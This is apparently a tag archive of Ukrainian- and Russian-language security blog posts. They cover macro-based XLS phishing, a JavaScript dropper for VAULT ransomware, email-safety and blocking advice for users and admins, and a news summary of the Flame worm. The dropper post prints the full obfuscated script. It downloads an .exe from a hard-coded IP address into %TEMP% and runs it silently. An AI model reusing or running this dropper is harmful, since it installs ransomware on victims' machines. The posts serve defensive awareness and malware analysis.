Tag Archive | virus

Правила роботи з email #2

Короткий допис по гарячих слідах чергової атаки.

Детальний звіт буде згодом!

Якщо коротко, то ситуація виглядає наступним чином:

  1. Жертва отримує електронного листа з фейкової адреси
  2. Жертва відкриває приєднання (у цьому випадку це був .XLS, але це не суттєво)
  3. Жертву просять увімкнути макроси (!)
  4. Після активації макросів з оболонки XLS в %temp% розпаковується .EXE
  5. .exe здійснює з’єднання з C&C та виконує перевірку системи (OS, hostname…)
  6. Далі з C&C здійснюється завантаження необхідних модулів

Проміжні висновки:

  • перевіряйте заголовки листів
  • не запускайте одразу приєднання
  • не дозволяйте макроси без попередньої перевірки на окремій ВМ або VirusTotal
  • якщо працювати з файлами від невідомих потрібно – блокуйте запуск скриптів та запускних файлів з каталогів %temp% та AppData

Мої рекомендації із старого допису досі залишаються актуальними.

Процес інфікування тестової системи:

winxp1 winxp2 winxp3 winxp7 winxp8

XLS`ий файл – приманка для користувача, його задача – змусити людину активувати макрос.

Макрос видобуває тіло test_vb.exe, який виконує збір інформації про машину та відправляє на C&C.

Зауважу – тут не йдеться про якийсь свіжий, небезпечний exploit.

Це просто приклад фішингу із базовими елементами соц. інженерії.

PS

Спеціалісти CERT-UA відреагували швидко. C&C блоковано.

Слідкуйте за оновленнями. І пам’ятайте про правила здорового глузду при роботі із поштою.

VR

чого варті 37 рядків коду?

js_2KB

Продовження теми про js dropper для VAULT ransomware. Моя колекція вірусів нещодавно поповнилася новим семплом. Знайомтесь – новий зразок розсилається під виглядом резюме:

Good afternoon!!! my name is John Doe. my resume is doc file.

Feel free to contact us for further information.

Best regards

John Doe

Не важко здогадатися, що в аттачі зовсім не резюме і зовсім не Word`івський документ ;)

Що ж ми маємо: на одній шальці терезів 37 рядків (якихось 2КБ коду), а на іншій – ~ 10 тисяч гривень* за відновлення доступу до зашифрованих файлів. Що, важко повірити? А між тим це реальність. Як бачите, простіше може бути лише ярлик або прямий лінк на payload.

* з надійних джерел стало відомо, що фіксованої такси немає, ціна визначається для кожної системи окремо (аналіз файлів та параметрів машини?). Така собі своєрідна реалізація “персонального підходу” до жертви з боку зловмисників. Наведена цифра – це сума викупу, який озвучили зловмисники для однаєї організації, чий бухгалтер став жертвою даного вірусу.

Якщо згадати, то ще кілька місяців тому ми мали справу з таким:

Акт_сверкиА тепер крім .EXE та .SCR треба блокувати ще й .JS, причому зверніть увагу – розрахунок дуже тонкий, адже навіть при великому бажанні адміна порізати .JS через GPO – на бухгалтерських машинах це майже нереально (привіт клієнт-банкам та іншим самописним додаткам).

Спостерігаючи за еволюцією вірусів-вимагачів, на думку приходять такі рядки:

“Ладно, ладно…” – пробормотал  Румата,  отложил письмо, снова взял конверт и с интересом его  оглядел.  Да,  тоньше  стали работать. Заметно тоньше.
(с) Трудно быть Богом, Аркадий и Борис Стругацкие

Про всяк випадок наведу лістинг скрипта:

(function (KoKcft) {
function aVWQhsstSqoZ(eADQHj)
{
return new KoKcft.ActiveXObject(eADQHj)
}
var mDvRCsgLRzmtGfG = true, dmEbqVHBYRJe = “DB.Stream”;
var YqTmIx;
YqTmIx = function (KaKFcDYJbvIm, NSBmPWZ, oTnbrilP) {
var IAaGpH = aVWQhsstSqoZ(“WScript”+(1354969, “.Shell”));
var PzbgqWmYaoNrjPC = aVWQhsstSqoZ(“MSXML2.XMLHTTP”);
var pKFrVxTqQrQu = “%TEMP%\\”;
var NSBmPWZ = IAaGpH.ExpandEnvironmentStrings(pKFrVxTqQrQu) + NSBmPWZ;
PzbgqWmYaoNrjPC.onreadystatechange = function ()
{
if (PzbgqWmYaoNrjPC.readyState == 4)
{
mDvRCsgLRzmtGfG = false;
with(aVWQhsstSqoZ(“ADO” + dmEbqVHBYRJe))
{
open();
type = 1;
write(PzbgqWmYaoNrjPC.ResponseBody);
saveToFile(NSBmPWZ, 2);
close();
return NSBmPWZ;
}
}
}
PzbgqWmYaoNrjPC.open(“G” + (3630489, 4593171, “ET”), KaKFcDYJbvIm, false);
PzbgqWmYaoNrjPC.send();
while (mDvRCsgLRzmtGfG) {KoKcft.WScript.Sleep(1000)}
if (((new Date())>0,1069))
IAaGpH.Run(NSBmPWZ, 0, 0);
}
eWHggwxvhx = “httDLZCEGHQTDBr”/*eWHggwxvhxLyVfWYHyyObaEAx*/.replace(“tDLZCEGHQTDBr”,”tp://”);
YqTmIx(eWHggwxvhx + “46.30”+”.43.183/sy”+”ria.”+”e”+”x”+”e”, “144157771.exe“, 1);
})(this)/*990234507307480333455052203452*/

Тут замість base64 просто застосували concatenation для маскування URL. Алгоритм доволі примітивний – завантажити .EXE у каталог %TEMP% і запустити. Але ж це лише початок.

Адже будуть знаходитись компанії, в яких завчасно не подбали ні про захист, ні про бекапи. І будуть платити викуп. А це буде стимулювати галузь.

На жаль, я вже відстежую непоодинокі випадки зараження. І далі буде тільки гірше, бо код буде вдосконалюватися, а люди… Людську недбалість важко “пропатчити”, цим і користуються зловмисники, практикуючи соц. інжиніринг.

Самое дорогое на свете — глупость, потому что за неё дороже всего приходится платить.

(с) Место встречи изменить нельзя

# # #

Будьте обережними і уважними.

Не поспішайте відкривати/запускати приєднання з листів – два кліки можуть насправді дорого коштувати.

Правила здорового глузду шукайте у попередньому дописі.

VR

[Увага!] Правила безпечної роботи з email

the only easy day was yesterday (с) U.S. Navy SEAL

Або як не підхопити черговий різновид вірусу, котрий шифрує файли.

Останнім часом знов активізувалися віруси, що шифрують файли і вимагають гроші за їх розшифровку, себто різновид ransomware/cryptoware. І якщо на початку року це були .SCR або .EXE в обгортці архівного чи MS Word файлу, то тепер це java script. Використання JS дозволяє зловмисникам значно зменшити розмір принади (dropper), так приміром, один із семплів “важить” усього 4Кб:

ransom2

Modus operandi (метод дії) далеко не новий, але у поєднанні із базовими елементами соціальної інженерії його вистачає для того, щоб спровокувати жертву запустити скрипт. Як тільки скрипт запущено далі спрацьовує звична схема: в фоні завантажується основна частина, яка займається пошуком та шифруванням файлів. Після того, як процес завершено жертві дають інструкції як сплатити викуп через TOR мережу.

Важливі моменти:

  • віруси розповсюджуються через цільові розсилки (фішинг);
  • назви приєднань спеціально підібрані (Акт Сверки, документы..);
  • сервери, з яких довантажується основний payload – РФ;
  • в обгортці js команди пропущені через примітивний base64 (для обфускації);

base64

  • не потребує привілеїв Адміністратора.

Варто зазначити, що отримані семпли, навіть через 24/48 годин після першого випадку зараження мають досить низький рейт на VirusTotal. Зловмисникам достатньо буде замінити base64 на більш досконалий алгоритм і це автоматично змінює контрольну суму, що для більшості простих АВ означатиме пропуск свіжої версії. (Тут треба розуміти, що перед нами дууже спрощений механізм, мені наприклад стає моторошно, коли я подумаю, що трапиться, якщо автори доберуться приміром до Veil-Evasion і навчаться ним користуватися.)

Ті семпли, що потрапили мені до рук розпаковують своє основне тіло (payload) у каталог %temp%, а значить мої поради стосовно користувацьких AccessProtection Rules варто актуалізувати – для захисту від js-ransomware потрібно створити правило, яке б  блокувало створення та запуск .exe файлів у каталозі %temp%. Таким чином ми позбавляємося ризику того, що новий вид або версія js ще не потрапили у бази чи хмару антивірусного захисту.

Фактично, така собі “еволюція” онлайн здирництва – результат успішної монетизації попередніх атак. В умовах, коли більшість користувачів тупо відкривають і запускають усе, що їм надходить на пошту, у ІБ фахівців фактично є лише три сценарії:

  • блокувати запускні приєднання при отриманні пошти, до того, як лист потрапить на очі користувачу;
  • блокувати створення та запуск скриптів чи .exe файлів з каталогів TEMP;
  • використовувати засоби статичного та динамічного аналізу коду.

Кожен із вищезгаданих методів має як свої переваги так і недоліки. В кінцевому результаті, усе залежатиме від вартості та унікальності інформації, яку замовник може втратити. Без сумніву, компанії, що покладаються лише на простий АВ скан по сигнатурам – приречені. Подбайте про захист щоби не стати черговою жертвою. Варто розуміти, що атак менше не стане, навпаки – будуть з’являтися усе нові й нові різновиди. А враховуючи монетизацію і продаж готових конструкторів таких “шифрувальщиків-вимагачів” – для їх запуску зловмиснику не потрібно розбиратися в коді js. Враховуйте цей фактор.

# # #

Менше з тим, через брак часу розгорнутий аналіз цих зразків наведу трохи пізніше – як тільки отримаю результати з “пісочниці” McAfee ATD.

Натомість хотілося би ще раз нагадати читачам правила здорового глузду:

І. поради для пересічних користувачів:

  1. Не відкривайте приєднання від невідомих адресатів, або людей, яким ви не довіряєте. Взагалі. Я цілком серйозно.;
  2. Якщо ви отримали файл із підозрілою назвою від людини, з якою спілкуєтеся по роботі – не соромтеся перепитати її (“Що ти мені надіслав?“);
  3. Якщо вам по роботі усе ж таки потрібно працювати з підозрілими приєднаннями – в жодному разі не переглядайте вміст приєднання безпосередньо у поштовому клієнті/вікні Web-пошти (ОС спробує розпакувати вміст приєднання у тимчасовий каталог і запустити його, не варто цього робити одразу) *Це правило також стосується відображення PDF у вікні бравзера;
  4. Натомість, завантажте приєднання в окремий каталог, але не поспішайте запускати/відкривати(!);
  5. Проскануйте приєднання (швидше за все це буде архівний файл) антивірусом. Пам’ятайте – якщо ваш антивірус нічого підозрілого не знайшов – це ще не привід радіти;
  6. Після сканування АВ, не залежно від його результатів, уважно дійзнайтеся реальне розширення файлу – якщо розширення подвійне типу: документ.js.pdf або документ.exe.doc, тоді це вірус. *На цьому кроці вам допоможе зміна параметрів відображення файлів у стандартному Explorer або альтернативний файловий менеджер типу FAR;
  7. Якщо ви впевнені у тому, що файл не містить конфіденційної інформації (персональні дані, фінансові розрахунки) – завантажте його для перевірки на портал virustotal.com. Якщо хоча би 1-2 антивіруси виявлять загрозу – це вже привід не відкривати цей файл;
  8. Якщо хоча би по одному з вищенаведених пунктів виникає підозра – зверніться до вашого Адміністратора і попросіть його перевірити файл.

ІІ. поради для ІБ-ентузіастів:

  1. Бажано мати під рукою тестову ВМ із Windows яку можна використовувати у якості полігону. Усе що треба – VirualBox (або ваш улюблений гіпервізор) та ліцензійний образ ОС. Сенс у тому, щоби усі підозрілі файли запускати всередині ВМ і відстежувати поведінку запущеного файлу інструментами Марка Руссиновича: Process Explorer + Process Monitor.
  2. Користуйтеся засобами перевірки документів MS Office, PDF перелік за посиланням.

ІІІ. Поради для ІТ/ІБ фахівців:

  1. перш за все – проведіть бесіду з вашими працівниками, поясніть їм ризики і наслідки інфікування ransomware, продемонструйте на тестовій ВМ результат роботи вірусу. Тут усе просто – якщо люди не будуть усвідомлювати небезпеки втрати важливої інформації – жодні технічні а тим більше адміністративні заходи не будуть ефективними;
  2. перевірте статус резервного копіювання критичних серверів та робочих станцій користувачів. чия інформація обробляється та зберігається у єдиному екземплярі;
  3. засобами поштового серверу або шлюзу електронної пошти (приміром McAfee Email Gateway) блокуйте приєднання що містять такі типи файлів: .exe, .com, .bat., .js, .scr;
  4. на рівні робочих станцій/серверів подбайте про наявність АВ-захисту, при чому не покладайтеся лише на сигнатурний аналіз – якщо ваш АВ має функціонал блокування потенційно небезпечних дій (наприклад у McAfee VSE / ENS10 це т.з. AccessProtection Rules) активуйте їх, щоби антивірус міг блокувати запуск такі речі як запуск .exe та скриптів із каталогів TEMP;
  5. якщо ви переймаєтеся захистом від цільових атак із використанням соціального каналу + 0day вразливостей, раджу звернути увагу на McAfee ATD, принципи роботи якої я розглядав на прикладі вівісекції CTB-Locker.

Наразі у мене все.

Будьте пильними та уважними при роботі з електронною поштою.

Чекайте на детальний аналіз і результати аналізів з ATD.

VR

Worm.Win32.Flame – наследник Stuxnet и Duqu

Flame – ‘Industrial vacuum cleaner’

Как сообщил специалист “Лаборатории Касперского”, Роэль Шувенберг, ЛК удалось обнаружить новый вирус, который был создан для хищения данных из корпоративных сетей. По словам специалистов – это новая ступень в эволюции т.н. “умных угроз”.

Worm.Win32.Flame после проникновения в систему не производит никаких деструктивных действий по отношению к информации, которую обрабатывает система. Он начинает “шпионить” за пользователем – делает снимки экрана, записывает голос с микрофона, фиксирует нажатые клавиши.. и отправляет данные “хозяину”. Как отмечают исследователи, жизненный цикл вируса составляет около 5 лет – на протяжении этого времени ни одна(!) из систем безопасности не смога его обнаружить.

“Вирус находится в активном состоянии на протяжении уже 5 лет.
Если мы смогли распознать его только сейчас, то не исключено, что Flame продолжает действовать через коды, которых мы пока не знаем.” — Роэль Шоувенберг, ЛК
Новый штамм (как и его предшественники Duqu и Stuxnet) отличается целевой направленностью – заражению подвергались компьютеры стран ближнего востока. Тот факт, что код Win32.Flame достаточно сложен и выполнен на высоком уровне работает на версию о “государственном заказе” – явно поработала целая команда. Аналитики, которым удалось ознакомиться с исходным кодом склоняются к версии, что Flame разработан той же группой, которая разработала Stuxnet и Duqu.

Вирус имеет модульную структуру. Образец, который удалось обнаружить и изолировать “весил” 20 Мб.
Вирус эксплуатирует уязвимость в службе диспетчера очереди печати и автозапуск со сменных носителей. Заражая систему, вирус может действовать как автономно, так и принимая команды с серверов подконтрольных “хозяину”. Благодаря возможности дозагрузки модулей вирус превращается в “конструктор” что может быть использовано для проведения точечных атак с учетом “полевой обстановки” в корпоративной сети.

“Это достаточно сильная и сложная угроза.
Этот вирус больше чем инструмент, это конструктор для кибер оружия.
Он фиксирует все – от нажатий клавиш и того, что происходит у вас на экране до вашего голоса в микрофоне.
По мимо уже известных методик хищения данных, он включает в себя, например, поиск доступных Bluetooth устройств.Этот код не был написан любителем-тинейджером.
Это большой, сложный механизм, который похищая информацию, длительное время остается вне поля зрения защитных систем.” — Алан Вудворд, профессор вычислительной кафедры в Университете Суррея

Источники:kaspersky [RU]
kaspersky [EN]
BBC